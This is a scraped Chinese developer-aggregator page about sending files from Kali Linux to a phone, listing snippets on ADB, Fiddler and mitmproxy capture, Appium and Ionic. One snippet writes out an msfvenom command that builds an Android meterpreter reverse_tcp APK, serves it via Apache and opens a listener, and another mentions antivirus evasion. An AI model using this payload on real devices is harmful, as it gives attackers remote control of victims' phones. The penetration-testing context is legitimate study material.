首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
kali文件发送到手机
2024-08-30
电脑kail linux 连接手机Nethunter,手机和电脑互传文件
1.开启nethunter的ssh 修改/etc/ssh/sshd_config 参考:解决kali linux 开启ssh服务后连接不上的问题 2.如果在手机终端修改不了(我的就是怎么也改不了),可以开启vnc 点击stat server 输入密码:rootroot 尝试在手机vnc 客户端修改/etc/ssh/sshd_config 3.如果2中还是不方便修改(反正我的怎么点击都没反应),就在电脑安装vnc客户端:https://www.realvnc.com/en/connect/down
Kali渗透安卓手机
kali渗透安卓手机 1.生成木马文件 msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=端口 R > test.apk 在终端输入ifconfig查看本机ip地址 开启apache服务service apache2 start 将文件放在服务器cp test.apk /var/www/html 查看服务器目录文件ls /var/www/html 可以看到已经在服务器下生成了test.apk文件 2.开启监听 输入msfcons
BLE-NRF51822教程17-DFU使用手机升级
演示的工程是 [application] nRF51_SDK_10.0.0_dc26b5e\examples\ble_peripheral\ble_app_hrs\pca10028\s110_with_dfu [bootload] nRF51_SDK_10.0.0_dc26b5e\examples\dfu\bootloader\pca10028\dual_bank_ble_s110 [softdevice] nRF51_SDK_10.0.0_dc26b5e\componen
Python爬虫入门教程 47-100 mitmproxy安装与安卓模拟器的配合使用-手机APP爬虫部分
1. 准备下载软件 介绍一款爬虫辅助工具mitmproxy ,mitmproxy 就是用于MITM的proxy,MITM中间人攻击.说白了就是服务器和客户机中间通讯多增加了一层.跟Fiddler和Charles最大的不同就是,mitmproxy可以进行二次开发,尤其可以对接python. mitmproxy一般用于开发或者测试,用在爬虫辅助也是极好的. 1.1 几个重要地址 github地址:https://github.com/mitmproxy/mitmproxy 官网地址:https://
NRF51822之DFU使用手机升级
演示的工程是 [application] nRF51_SDK_10.0.0_dc26b5e\examples\ble_peripheral\ble_app_hrs\pca10028\s110_with_dfu [bootload] nRF51_SDK_10.0.0_dc26b5e\examples\dfu\bootloader\pca10028\dual_bank_ble_s110 [softdevice] nRF51_SDK_10.0.0_dc26b5e\componen
Fiddler4 手机抓包
1.要对计算机Fiddler进行配置,允许远程计算机连接. 2.保证手机电脑在同一局域网中. 3.手机上设置代理服务器.以华为手机为例,设置-->WLAN-->找到并长按目前所连接的WiFi-->修改网络-->勾选显示高级选项-->代理-->选择手动-->输入FIddler所在主机IP及端口-->确定. 4.在手机上安装证书.(为了抓取https包) 方法1:在手机浏览器上输入:http://IPv4地址:端口(例如:http://192.168.11.29
转 Fiddler4 手机抓包
Fiddler4 手机抓包 文章转自:https://www.cnblogs.com/zhengna/p/10876954.html 1.要对计算机Fiddler进行配置,允许远程计算机连接. 2.保证手机电脑在同一局域网中. 3.手机上设置代理服务器.以华为手机为例,设置-->WLAN-->找到并长按目前所连接的WiFi-->修改网络-->勾选显示高级选项-->代理-->选择手动-->输入FIddler所在主机IP及端口-->确定. 4.在手机上安装证书
移动端https抓包那些事--初级篇
对于刚刚进入移动安全领域的安全研究人员或者安全爱好者,在对手机APP进行渗透测试的时候会发现一个很大的问题,就是无法抓取https的流量数据包,导致渗透测试无法继续进行下去. 这次给大家介绍一些手机端如何抓取https流量的技巧. 下面将主要通过两个层次篇章来逐步向大家进行介绍: 第一篇章-初级篇:浅层次抓包.对于非root设备(Android)或非越狱设备(iOS)如何抓取https流量: 第二篇章-进阶篇:深层次抓包.对于root设备或者越狱设备如何抓取https流量. 对于非roo
Metasploit运行环境内存不要低于2GB
Metasploit运行环境内存不要低于2GB Metasploit启用的时候,会占用大量的内存.如果所在系统剩余内存不足(非磁盘剩余空间),会直接导致运行出错.这种情况特别容易发生在虚拟机Kali系统或者手机Linux Deploy运行Kali的情况.使用这类系统,保证所在的Kali Linux系统内存不要低于2GB.
搭建ionic3-angular5 开发环境并打包成安卓apk包教程
安装node.js 搭建ionic3-angular5 开发环境,首先查看本地电脑是否安装node环境,打开终端,输入 命令: node -v 没有去安装nodejs 网址:http://nodejs.cn/download/ 安装ionic 接着在终端输入: 命令: npm install -g ionic 接着检验java开发环境: 在终端输入: 命令: java 命令:java -version java 下载地址:https://www.oracle.com/technetwork/
常见adb指令
1. adb –-help 查看帮助文档 2. adb start-server 当adb没有启动或被手动杀掉时,可以使用该命令启动服务 3. adb kill-server 杀死adb服务 4. adb devices 获取手机标识码 5. adb shell getprop ro.build.version.release 获取当前手机系统版本 6. adb shell 进入到手机终端 7. adb push 电脑端文件路径/需要发送的文件 手机端存储的路径 作用:将电脑上的文件发送给手机
python3编写网络爬虫19-app爬取
一.app爬取 前面都是介绍爬取Web网页的内容,随着移动互联网的发展,越来越多的企业并没有提供Web页面端的服务,而是直接开发了App,更多信息都是通过App展示的 App爬取相比Web端更加容易 反爬虫能力没有那么强,而且数据大多数是以JSON形式传递的 解析更加简单 在Web端 我们可以通过浏览器开发者工具 监听到各个网络请求和响应过程 在App端 查看内容就需要抓包软件例如 WireShark Fiddler Charles mitmproxy AnyProxy等 它们原理基本相同 可以
免费苹果账号(apple id)申请ios证书p12真机调试
HBuilder可以直接打包越狱版的ipa包,但需要越狱手机才能安装,如果需要安装到没越狱的手机安装,需要自己申请ios证书打包. 一般是需要一个付费了的苹果开发者账号才能申请ios证书打包. 这里介绍用普通的没有付费的苹果账号(apple id),直接申请ios证书p12,打包安装到没有越狱的手机真机调试,完全免费. 当然如果要上架App Store还是需要注册一个付费的苹果开发者账号. 苹果开发者账号申请教程 申请ios证书打包ipa测试分五步进行 1.申请一个苹果账号 2.申请ios测试证
ionic3 创建项目至apk打包全过程教程
主要流程: 安装node.js --> 安装jdk --> 安装AndroidSDK --> 安装cordova --> 安装ionic --> 创建项目 --> 编译项目apk 一.安装nodejs 不要安装最新版. 不建议更改安装路径. 网盘地址: 链接: https://pan.baidu.com/s/1Q5_nAhaJq6Ahw5DqSIzxXA 密码: 2sy7 查看nodejs版本: node -v 查看npm版本: npm -v 安装
20145233《网络对抗》Exp5 MSF基础应用
20145233<网络对抗>Exp5 MSF基础应用 实验问题思考 什么是exploit,payload,encode exploit是发现了的可以利用的安全漏洞或者配置弱点,这类模块存储着收集到的可利用漏洞和弱点. payload就是在利用漏洞成功后要做的事情,本质上是一段shellcode,通常都是用来获取会话的. encode是编码器,一方面确保之前的payload也就是载荷不出现坏字符影响使用,另一方面尽量掩饰载荷,进行免杀处理. 实验内容 MSF的六种模块 Exploit模块 利用发
Android入门篇(一)Androidproject的搭建,导入与导出,图标的改动
先说一些题外话吧.这是小珂同学的处女作.可能写的不好,请各位读者见谅.我先讲讲我为什么要写博文,那应该也是机缘巧合,有一次.我问学长一个问题,学长发了一个连接给我,里面是一篇博客.那时我仅仅是看看,后来还有一个学长给我介绍了CSDN.NET.看了里面的文档,才有了自己写博客的想法.前两天.我才知道原来学长们从大一就開始写了.我非常遗憾我错过了好多时间.也非常幸运..........(万千感慨) 近期几天我学习了Android.之前并没有学过Java,只是如今感觉自己还是入了门吧. 没学Ja
mitmproxy 使用笔记
零.背景 我之前写过关于 charles 的使用笔记,为什么现在又要来写同类型的 mitmproxy 工具呢?下面我会娓娓道来他比 charles 多出的强大功能. 一.介绍 mitmproxy 是一个支持 HTTP 和 HTTPS 的抓包程序, 类似 Fiddle.Charles , 只不过它通过 CMD 的形式操作. mitmproxy 还有两个关联组件: 一个是 mitmdump ,它是 mitmproxy 的命令行接口,利用它可以对接 Python 脚本,实现监听后的处理: 另一个是 m
1.移动端自动化测试-知识笔记(面试必备,测试点,adb命令)
移动端测试: 移动应用,特性(功能) 满足 需求(产品文档,隐性需求) 一.App功能测试: 死活背下来1.业务逻辑正确性测试: 产品文档,隐性需求- 写成测试用例 2.兼容性测试: 1.系统版本: android版本:官方版本(5.1 4.3 6.0…) 华为 小米 魅族 iOS版本:官方版本 2.分辨率:480x720 1920x 1080,关注点:图片展示 3.网络情况:2G 3G 4G Wi-Fi (闲话:图片下载时网络切换会压缩图片但是
(appium+python)UI自动化_10_adb常用命令
前言 adb(Android Debug Bridge)工具是android-sdk里的一个工具,是一个命令行窗口,用于通过电脑端与模拟器或者真实设备交互.在app自动化测试过程中,有时要用到adb命令,但是每次都要百度感觉很是繁琐,故总结了下app自动化过程中几个常用的adb命令. adb常用命令 获取设备号 $ adb devices 下载apk 前提:需下载apk至电脑 $ adb install <电脑apk路径> 卸载apk $ adb uninstall <apk包名>
『与善仁』Appium基础 — 4、常用ADB命令(一)
目录 1.启动和关闭ADB服务 2.查看ADB版本 3.指定adb server的网络端口 4.查询已连接设备/模拟器 5.获取安卓系统版本 6.为命令指定目标设备 7.发送文件到手机 8.从手机拉取文件 在上一篇文章中说明了ADB命令的使用方式: 使用ADB命令的前提是保证手机或者模拟器和电脑是连接状态. 使用adb connect 127.0.0.1:+端口号命令,进行链接. 本篇文章详细说明一下常用ADB命令的操作. 1.启动和关闭ADB服务 在某些情况下,可能需要终止然后再启动服务端进程
『与善仁』Appium基础 — 16、APPium基础操作API
目录 1.前置代码 2.安装和卸载APP 3.判断APP是否已安装 4.关闭APP软件和关闭驱动对象 5.发送文件到手机和获取手机中的文件 6.获取当前屏幕内元素结构(重点) 7.脚本内启动其他APP 8.将应用程序置于后台运行(重点) 1.前置代码 一个脚本中必须要编写的内容,写在前置代码中: # server 启动参数 desired_caps = {} desired_caps['platformName'] = 'Android' desired_caps['platformVersio
热门专题
kafka从头开始消费
proto 去掉XXX_sizecache
jquery选择第几个select标签
uwp grid listview嵌套
codeblocks编辑器主题个性化配置
手机sessionStorage和电脑
js时间转换为Date日期格式
java记录程序的执行时间的日志
rabbitmq 控制台登录不上
nginx 多域名 有的Http 有的https
sql server中文首字母大写
ABAP 动态赋值 列
pac规则 @@||是什么意思
java private怎么被调用
必须使用适当的属性或方法修改“Host”标头
csh 改为 bash
服务器安全狗centos操作
yandex.co​m网址
Python写一个正则表达式同时识别下面所有字符
tornado获取json数据